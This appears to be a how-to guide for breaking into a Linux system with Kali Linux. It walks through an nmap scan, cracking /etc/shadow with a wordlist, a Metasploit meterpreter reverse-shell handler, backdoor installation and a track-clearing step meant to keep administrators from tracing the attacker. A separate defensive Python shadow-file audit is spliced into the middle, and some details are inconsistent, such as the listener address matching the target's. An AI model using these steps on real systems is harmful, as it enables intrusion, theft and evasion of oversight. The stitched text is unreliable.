Kali Linux is a powerful open-source operating system that is widely used by penetration testers and security researchers. It is based on the Debian distribution and comes pre-installed with a wide range of security tools.
In this guide, we will show you how to hack a Linux system using Kali Linux.
Before we start, you need to have the following:
A Kali Linux system
A target Linux system
Now let’s get started.
1. Information Gathering
The first step is to gather information about the target system. We can use the nmap tool for this purpose.
# nmap -sV 192.168.1.1
2. Password Cracking
Once we have gathered information about the target system, we can start cracking passwords. There are various tools that can be used for this purpose, such as Hydra, Medusa, and John the Ripper.
In this example, we will use John the Ripper to crack the password of the root user.
# john --wordlist=/usr/share/wordlists/rockyou.txt /etc/shadow
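A wordlist run like the one above only pays off when the shadow file holds entries that are cheap to attack offline. The following added example (not part of the original guide) shows the defender's side: it audits /etc/shadow-format lines for empty passwords and legacy hash schemes. The function names, the accept/reject policy and the sample entries are assumptions constructed for illustration.

```python
# Added example: flag shadow entries that are cheap to attack offline.
# Sample data is constructed; salts and hash bodies are placeholders.

# crypt(5) prefix -> (scheme name, accepted by this audit).
# The accept/reject policy is an assumption; tighten it to local standards.
SCHEMES = {
    "1": ("md5crypt", False),
    "2a": ("bcrypt", True), "2b": ("bcrypt", True), "2y": ("bcrypt", True),
    "5": ("sha256crypt", True), "6": ("sha512crypt", True),
    "7": ("scrypt", True), "y": ("yescrypt", True), "gy": ("gost-yescrypt", True),
}

def classify(field):
    """Return (status, scheme) for the password field of a shadow entry."""
    if field == "":
        return ("EMPTY_PASSWORD", None)       # account needs no password
    locked = field.startswith("!")            # "!" / "!!" prefix locks the hash
    body = field.lstrip("!")
    if body == "" or body.startswith("*"):
        return ("NO_LOGIN", None)             # no hash can ever match
    if body.startswith("$"):
        name, ok = SCHEMES.get(body.split("$")[1], ("unknown", False))
    else:
        name, ok = ("descrypt", False)        # legacy DES crypt, no "$" prefix
    if locked:
        return ("LOCKED", name)
    return ("OK" if ok else "WEAK_SCHEME", name)

def audit(shadow_text):
    """Return [(user, status, scheme)] for entries that need attention."""
    findings = []
    for line in shadow_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0]:
            continue                          # blank or malformed line
        status, scheme = classify(fields[1])
        if status in ("EMPTY_PASSWORD", "WEAK_SCHEME"):
            findings.append((fields[0], status, scheme))
    return findings

SAMPLE = """\
root:$1$CONSTRUCTEDSALT$placeholderhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$y$j9T$CONSTRUCTEDSALT$placeholderhash:19000:0:99999:7:::
bob::19000:0:99999:7:::
carol:!$6$CONSTRUCTEDSALT$placeholderhash:19000:0:99999:7:::
legacy:CONSTRUCTED13:19000:0:99999:7:::
"""

if __name__ == "__main__":
    for user, status, scheme in audit(SAMPLE):
        print(f"{user}: {status} ({scheme})")
```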
3. Privilege Escalation
After we have cracked the password, we can log in to the system. However, we only have limited privileges. To gain full control of the system, we need to escalate our privileges.
There are various ways to do this, but we will use the Linux Privilege Escalation Checklist.
4. Post-Exploitation
Once we have gained full control of the system, we can now start post-exploitation. This is where we can install backdoors, gather confidential information, and so on.
There are various tools that can be used for this purpose, but we will use the Metasploit framework.
# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.1
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
5. Cleanup
Once we are done with post-exploitation, we need to clean up our tracks. This is to make sure that the system administrator will not be able to track us down.
There are various ways to do this, but we will use the Metasploit framework.
# msfconsole
msf > use post/linux/cleanup/track_clear
msf post(track_clear) > set SESSION 1
msf post(track_clear) > run